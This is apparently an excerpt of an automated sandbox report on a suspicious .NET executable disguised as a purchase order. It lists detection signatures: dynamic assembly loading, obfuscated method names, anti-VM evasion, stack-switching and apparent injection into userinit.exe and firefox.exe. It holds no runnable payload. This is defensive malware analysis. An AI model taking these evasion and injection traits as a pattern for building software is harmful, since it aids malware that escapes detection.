            Source: 0.2.PO-000001488.exe.30d645c.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO-000001488.exe.7430000.3.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, UCmBvFDMba3C8pjQFg.cs.Net Code: RxSWYVP7ZR System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, UCmBvFDMba3C8pjQFg.cs.Net Code: RxSWYVP7ZR System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO-000001488.exe.30e6d08.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
            Source: 8.2.userinit.exe.391cd14.2.raw.unpack, Login.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 9.0.MpfhURuSBZcuS.exe.316cd14.1.raw.unpack, Login.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 9.2.MpfhURuSBZcuS.exe.316cd14.1.raw.unpack, Login.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 12.2.firefox.exe.37fbcd14.0.raw.unpack, Login.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0041A87D push esp; retf 3_2_0041A87E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0040710D pushfd ; retf 3_2_0040710E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_00423916 push esi; retf 3_2_0042392E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_00423923 push esi; retf 3_2_0042392E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_004031D0 push eax; ret 3_2_004031D2
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_00418B76 push ebx; retf 3_2_00418B77
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0041A3C1 push edi; retf 3_2_0041A3C7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_004143E3 push edi; iretd 3_2_004143EF
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_00417BE6 push es; ret 3_2_00417BE7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_00411DA3 push edi; iretd 3_2_00411DAF
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D09AD push ecx; mov dword ptr [esp], ecx3_2_014D09B6
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A525F7 push esp; retf 7_2_05A525FD
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A4EC52 push edi; iretd 7_2_05A4EC5E
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A43FBC pushfd ; retf 7_2_05A43FBD
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A5772C push esp; retf 7_2_05A5772D
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A4794E push esp; iretd 7_2_05A4795B
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A54A95 push es; ret 7_2_05A54A96
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A51292 push edi; iretd 7_2_05A5129E
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A55A25 push ebx; retf 7_2_05A55A26
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A57270 push edi; retf 7_2_05A57276
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033209AD push ecx; mov dword ptr [esp], ecx8_2_033209B6
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC0743 push esi; retf 8_2_00AC075B
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC0750 push esi; retf 8_2_00AC075B
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC0962 push cs; retf 8_2_00AC0963
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AB4A13 push es; ret 8_2_00AB4A14
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC0A5C push C67CA722h; ret 8_2_00AC0A61
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AAEBD0 push edi; iretd 8_2_00AAEBDC
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AB71EE push edi; retf 8_2_00AB71F4
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AB1210 push edi; iretd 8_2_00AB121C
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC15D5 push edi; ret 8_2_00AC15D9
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC152D push ecx; retf 8_2_00AC1576
            Source: PO-000001488.exeStatic PE information: section name: .text entropy: 7.8168604118663545
            Source: 0.2.PO-000001488.exe.30d645c.1.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
            Source: 0.2.PO-000001488.exe.30d645c.1.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
            Source: 0.2.PO-000001488.exe.7430000.3.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
            Source: 0.2.PO-000001488.exe.7430000.3.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, BPlxsxcckWogO2nnrn.csHigh entropy of concatenated method names: 'rnwhK6urTo', 'xMZhArAvMs', 'hiGhioyGxs', 'RXYhcWxPIo', 'cAQhCkUdF2', 'GpNhoLwj9q', 'ISXhHwb3Wc', 'QtLhapUww0', 'Q33h3uiEV2', 'LWDhdcxDrt'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, O0UUP8i4yfT9fmLmQP.csHigh entropy of concatenated method names: 'rWd6F2HI3W', 'Apm68iyKmt', 'D9k6BMMF4c', 'FxM6QQJiFP', 'B3Z61d2dcR', 'gws6wO2F5A', 'YZ46kcdl7n', 'vI06JxlymM', 'Fp76ODoiB0', 'gyN6jFDmZQ'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, nOlci2QapKAZ1kgqEZ.csHigh entropy of concatenated method names: 'dcBHmnm4hX', 'QRfHUuwA5U', 'ToString', 'Q8VHulA633', 'Sj1H6ZZfXl', 'sjBHhEuFMJ', 'FfqHrY1wUg', 't7eHxp0Kpb', 'TIgH0bqQ4h', 'qTAHDOOr9L'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, wGRXxu72Ioh9nVU8T3.csHigh entropy of concatenated method names: 'qIBxsHTCyA', 'iCfxpHpliY', 'XhZxYePG7v', 'uJExK22O3N', 'Q0axAn93xt', 'Simxv8Unyk', 'gRWxcG9OV9', 'atqxXkiqfC', 'Thhoby4BpmqTw0yvBK3', 'mjVGvw4KFv01yASd7vF'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, fqxTxmFZn07U001mtD.csHigh entropy of concatenated method names: 'd3UCeojq7k', 'ElbCfS6JQD', 'AOLCFurVvc', 'FeNC80kVf7', 'qPfCNiO6rr', 'SUoCGbChKT', 'ghxC7KxExr', 'j7oCqAeyLY', 'mlQCSNLKsq', 'obMCEKD1XE'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, AaC32U6OC6QtDf7XM2.csHigh entropy of concatenated method names: 'Dispose', 'w58bOINoxp', 'cQ7nNFiNqA', 'YOD66FrGPd', 'JpMbjCVwDc', 'tqCbztsvle', 'ProcessDialogKey', 'DV7n47GYoH', 'jySnbCFBfX', 'fJTnnBdFhk'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, xMCVwDJcRqCtsvleiV.csHigh entropy of concatenated method names: 'xS1auJX5K5', 'CAga6Z8meb', 'DWYahntmnP', 'NRharbda7U', 'w8yaxJyxvD', 'Rcva064paZ', 'WoMaDTGOKK', 'UjwaVUdXrE', 'QxVamyWXCs', 'uvGaUFGI4F'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, TNIF3IXyiVuFqaIWkv.csHigh entropy of concatenated method names: 'Wb8rtmV9iE', 'xEvrvKBMqr', 'VkGhGGt8qI', 'KNnh7BfFQD', 'lsohqUA7im', 'JVrhSXORaL', 'xPGhECVBnW', 'FiphlE7TLX', 'QkAhTv4cOF', 'acVhe536UM'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, TdFhkJjoMUbgPRLvS4.csHigh entropy of concatenated method names: 'MtQ3blJg7w', 'gy43PaYfjG', 'epR3WojyRc', 'pn93uSEcM1', 'UNv36U8Q47', 'JAB3r5sA1B', 'Met3xairCk', 'zXaak8MlHL', 'VU0aJMvWht', 'wGvaODIBsq'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, wsJe4SWIybCv17e2nY.csHigh entropy of concatenated method names: 'Saeb00UUP8', 'ayfbDT9fmL', 'ickbmWogO2', 'bnrbUnQNIF', 'rIWbCkvI12', 'HetbomiM4d', 'n93fvwRq85en0j64lj', 'tu4fJGla6s1JegPB9P', 'RIcbbwHrZV', 'n8ZbPkMiur'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, OxjoZ6bbm21QQxSqW8X.csHigh entropy of concatenated method names: 'ToString', 'mbvdPW5hGs', 'UYydWFnMqu', 'tbYdIZ8tFu', 'KcxduxGlqd', 'St6d6iKEr9', 'qyudhkQv5t', 'hYndrjTTfZ', 'tPlBdmsVVY8323twxxK', 'eeGpj2sWR9b42q1iQ71'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, D7du7qn2eVlNJAYjtI.csHigh entropy of concatenated method names: 'ArWYPVm9I', 'gqXKMjjxW', 'ccaAMXO6R', 'y2evApZ6m', 'uFacOPVnj', 'BAuX4eKcX', 'kwmaYfcbw0pYU93Hwj', 'Y8TZCZFHTOCvyeWOMx', 'dGcaZ9e3G', 'l5edp0uWA'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, wXC0QTZW7TisKVoavE.csHigh entropy of concatenated method names: 'iO2yiMh5qt', 'onOycKxilL', 'lfSyMpgm0F', 'fHIyN22SYL', 'hLZy72vpoV', 'wL0yqTEkEF', 'kwTyEF4NOW', 'D7iylnCfxY', 'xTgyeW22gk', 'Jrky9A6TKX'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, RiTyHxTGD7rZj7FANZ.csHigh entropy of concatenated method names: 'vST0pINXL6', 'ERI0L71Emv', 'tJO0Ymjdk5', 'G350KpbnFT', 'KPs0tJGZDe', 'n7v0Atuuqr', 'KhT0vZ55Pc', 'Kiq0ibKPr8', 'y4S0cDsR5N', 'GbW0XjjD1S'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, I7GYoHO0ySCFBfXuJT.csHigh entropy of concatenated method names: 'AvuaM1fJCn', 'MRZaNCDpRY', 'umyaG5JHN3', 'lZQa7WbYxM', 'pWdaFgolnX', 'raqaqQKaSe', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, e12NetMmiM4d5y2Gkx.csHigh entropy of concatenated method names: 'XVExIPAcAO', 'kHix607Fdm', 'OgexrfKIjC', 'SETx006Kax', 'SwYxDaQlB1', 'u62r1Y4mlm', 'NHhrweDTTm', 'qCerk37aAj', 'JTfrJKvXnL', 'mH5rOPSxRU'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, TouAI8wx67xn70uYkG.csHigh entropy of concatenated method names: 'c6UHJutu4r', 'YZSHjbD4bs', 'KGja4AavOf', 'mLBabx6xBn', 'nekH9pe3nx', 'rkTHfmMGhf', 'AIUHZIVrSr', 'tsEHFUpH4T', 'aQpH8V1Wwq', 'R5gHB9rVKV'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, UCmBvFDMba3C8pjQFg.csHigh entropy of concatenated method names: 'PSBPISvDfm', 'vj3PuVlUDI', 'xkbP6lOULk', 'YfjPh9OdcI', 'WRmPr3p1HX', 'cKoPxX55VH', 'yZbP00PYc6', 'umDPDMTqxq', 'un4PVxNgHm', 'RQZPmaHQgZ'
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, gSZV5Qb4gV5Kwu4PBBe.csHigh entropy of concatenated method names: 'Jkm3pM1w8s', 'pDU3Ltm5V4', 'hHs3Y2ouY0', 'zS83KGvM2y', 'KSp3tOfoyD', 'YQ53AebeOg', 'Riv3v1VRX5', 'L8o3iK6FFR', 'NxX3c9nmxK', 'bnB3XB27i5'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, BPlxsxcckWogO2nnrn.csHigh entropy of concatenated method names: 'rnwhK6urTo', 'xMZhArAvMs', 'hiGhioyGxs', 'RXYhcWxPIo', 'cAQhCkUdF2', 'GpNhoLwj9q', 'ISXhHwb3Wc', 'QtLhapUww0', 'Q33h3uiEV2', 'LWDhdcxDrt'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, O0UUP8i4yfT9fmLmQP.csHigh entropy of concatenated method names: 'rWd6F2HI3W', 'Apm68iyKmt', 'D9k6BMMF4c', 'FxM6QQJiFP', 'B3Z61d2dcR', 'gws6wO2F5A', 'YZ46kcdl7n', 'vI06JxlymM', 'Fp76ODoiB0', 'gyN6jFDmZQ'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, nOlci2QapKAZ1kgqEZ.csHigh entropy of concatenated method names: 'dcBHmnm4hX', 'QRfHUuwA5U', 'ToString', 'Q8VHulA633', 'Sj1H6ZZfXl', 'sjBHhEuFMJ', 'FfqHrY1wUg', 't7eHxp0Kpb', 'TIgH0bqQ4h', 'qTAHDOOr9L'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, wGRXxu72Ioh9nVU8T3.csHigh entropy of concatenated method names: 'qIBxsHTCyA', 'iCfxpHpliY', 'XhZxYePG7v', 'uJExK22O3N', 'Q0axAn93xt', 'Simxv8Unyk', 'gRWxcG9OV9', 'atqxXkiqfC', 'Thhoby4BpmqTw0yvBK3', 'mjVGvw4KFv01yASd7vF'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, fqxTxmFZn07U001mtD.csHigh entropy of concatenated method names: 'd3UCeojq7k', 'ElbCfS6JQD', 'AOLCFurVvc', 'FeNC80kVf7', 'qPfCNiO6rr', 'SUoCGbChKT', 'ghxC7KxExr', 'j7oCqAeyLY', 'mlQCSNLKsq', 'obMCEKD1XE'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, AaC32U6OC6QtDf7XM2.csHigh entropy of concatenated method names: 'Dispose', 'w58bOINoxp', 'cQ7nNFiNqA', 'YOD66FrGPd', 'JpMbjCVwDc', 'tqCbztsvle', 'ProcessDialogKey', 'DV7n47GYoH', 'jySnbCFBfX', 'fJTnnBdFhk'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, xMCVwDJcRqCtsvleiV.csHigh entropy of concatenated method names: 'xS1auJX5K5', 'CAga6Z8meb', 'DWYahntmnP', 'NRharbda7U', 'w8yaxJyxvD', 'Rcva064paZ', 'WoMaDTGOKK', 'UjwaVUdXrE', 'QxVamyWXCs', 'uvGaUFGI4F'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, TNIF3IXyiVuFqaIWkv.csHigh entropy of concatenated method names: 'Wb8rtmV9iE', 'xEvrvKBMqr', 'VkGhGGt8qI', 'KNnh7BfFQD', 'lsohqUA7im', 'JVrhSXORaL', 'xPGhECVBnW', 'FiphlE7TLX', 'QkAhTv4cOF', 'acVhe536UM'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, TdFhkJjoMUbgPRLvS4.csHigh entropy of concatenated method names: 'MtQ3blJg7w', 'gy43PaYfjG', 'epR3WojyRc', 'pn93uSEcM1', 'UNv36U8Q47', 'JAB3r5sA1B', 'Met3xairCk', 'zXaak8MlHL', 'VU0aJMvWht', 'wGvaODIBsq'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, wsJe4SWIybCv17e2nY.csHigh entropy of concatenated method names: 'Saeb00UUP8', 'ayfbDT9fmL', 'ickbmWogO2', 'bnrbUnQNIF', 'rIWbCkvI12', 'HetbomiM4d', 'n93fvwRq85en0j64lj', 'tu4fJGla6s1JegPB9P', 'RIcbbwHrZV', 'n8ZbPkMiur'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, OxjoZ6bbm21QQxSqW8X.csHigh entropy of concatenated method names: 'ToString', 'mbvdPW5hGs', 'UYydWFnMqu', 'tbYdIZ8tFu', 'KcxduxGlqd', 'St6d6iKEr9', 'qyudhkQv5t', 'hYndrjTTfZ', 'tPlBdmsVVY8323twxxK', 'eeGpj2sWR9b42q1iQ71'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, D7du7qn2eVlNJAYjtI.csHigh entropy of concatenated method names: 'ArWYPVm9I', 'gqXKMjjxW', 'ccaAMXO6R', 'y2evApZ6m', 'uFacOPVnj', 'BAuX4eKcX', 'kwmaYfcbw0pYU93Hwj', 'Y8TZCZFHTOCvyeWOMx', 'dGcaZ9e3G', 'l5edp0uWA'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, wXC0QTZW7TisKVoavE.csHigh entropy of concatenated method names: 'iO2yiMh5qt', 'onOycKxilL', 'lfSyMpgm0F', 'fHIyN22SYL', 'hLZy72vpoV', 'wL0yqTEkEF', 'kwTyEF4NOW', 'D7iylnCfxY', 'xTgyeW22gk', 'Jrky9A6TKX'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, RiTyHxTGD7rZj7FANZ.csHigh entropy of concatenated method names: 'vST0pINXL6', 'ERI0L71Emv', 'tJO0Ymjdk5', 'G350KpbnFT', 'KPs0tJGZDe', 'n7v0Atuuqr', 'KhT0vZ55Pc', 'Kiq0ibKPr8', 'y4S0cDsR5N', 'GbW0XjjD1S'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, I7GYoHO0ySCFBfXuJT.csHigh entropy of concatenated method names: 'AvuaM1fJCn', 'MRZaNCDpRY', 'umyaG5JHN3', 'lZQa7WbYxM', 'pWdaFgolnX', 'raqaqQKaSe', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, e12NetMmiM4d5y2Gkx.csHigh entropy of concatenated method names: 'XVExIPAcAO', 'kHix607Fdm', 'OgexrfKIjC', 'SETx006Kax', 'SwYxDaQlB1', 'u62r1Y4mlm', 'NHhrweDTTm', 'qCerk37aAj', 'JTfrJKvXnL', 'mH5rOPSxRU'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, TouAI8wx67xn70uYkG.csHigh entropy of concatenated method names: 'c6UHJutu4r', 'YZSHjbD4bs', 'KGja4AavOf', 'mLBabx6xBn', 'nekH9pe3nx', 'rkTHfmMGhf', 'AIUHZIVrSr', 'tsEHFUpH4T', 'aQpH8V1Wwq', 'R5gHB9rVKV'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, UCmBvFDMba3C8pjQFg.csHigh entropy of concatenated method names: 'PSBPISvDfm', 'vj3PuVlUDI', 'xkbP6lOULk', 'YfjPh9OdcI', 'WRmPr3p1HX', 'cKoPxX55VH', 'yZbP00PYc6', 'umDPDMTqxq', 'un4PVxNgHm', 'RQZPmaHQgZ'
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, gSZV5Qb4gV5Kwu4PBBe.csHigh entropy of concatenated method names: 'Jkm3pM1w8s', 'pDU3Ltm5V4', 'hHs3Y2ouY0', 'zS83KGvM2y', 'KSp3tOfoyD', 'YQ53AebeOg', 'Riv3v1VRX5', 'L8o3iK6FFR', 'NxX3c9nmxK', 'bnB3XB27i5'
            Source: 0.2.PO-000001488.exe.30e6d08.0.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
            Source: 0.2.PO-000001488.exe.30e6d08.0.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: PO-000001488.exe PID: 2056, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
            Source: C:\Users\user\Desktop\PO-000001488.exeMemory allocated: 1580000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeMemory allocated: 50A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeMemory allocated: 7EB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeMemory allocated: 8EB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO-000001488.exeMemory allocated: 9060000 memory reserve | memory write watchJump to behavior
